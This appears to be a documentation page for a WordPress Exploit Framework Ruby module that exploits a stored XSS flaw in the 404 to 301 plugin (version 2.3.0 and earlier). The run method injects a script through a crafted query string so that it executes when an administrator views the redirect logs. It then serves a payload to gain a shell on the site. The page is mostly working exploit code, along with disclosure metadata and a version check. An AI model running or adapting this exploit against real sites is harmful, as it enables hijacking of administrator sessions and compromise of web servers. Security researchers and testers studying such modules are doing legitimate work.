class Wpxf::Exploit::Four04ToThree01StoredXssShellUpload

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::WordPress::Xss::new
# File lib/wpxf/modules/exploit/xss/stored/four04_to_three01_stored_xss_shell_upload.rb, line 6
def initialize
  super

  update_info(
    name: '404 to 301 <= 2.3.0 XSS Shell Upload',
    author: [
      'ldionmarcil', # Disclosure
      'rastating'    # WPXF module
    ],
    references: [
      ['WPVDB', '8611'],
      ['URL', 'https://gist.github.com/ldionmarcil/6793df929449f8781bb1e213d7e75e23']
    ],
    date: 'Aug 27 2016'
  )
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/four04_to_three01_stored_xss_shell_upload.rb, line 23
def check
  check_plugin_version_from_readme('404-to-301', '2.3.1')
end
run() click to toggle source
Calls superclass method Wpxf::Module#run
# File lib/wpxf/modules/exploit/xss/stored/four04_to_three01_stored_xss_shell_upload.rb, line 27
def run
  return false unless super

  emit_info 'Storing script...'
  res = execute_get_request(
    url: normalize_uri(full_uri, "?p=#{Utility::Text.rand_numeric(11)}\"><script>#{xss_include_script}</script>")
  )

  if res.nil?
    emit_error 'No response from the target'
    return false
  end

  if res.code != 200
    emit_error "Server responded with code #{res.code}"
    return false
  end

  emit_success 'Script stored and will be executed when a user views the 404 to 301 redirect logs'
  start_http_server

  xss_shell_success
end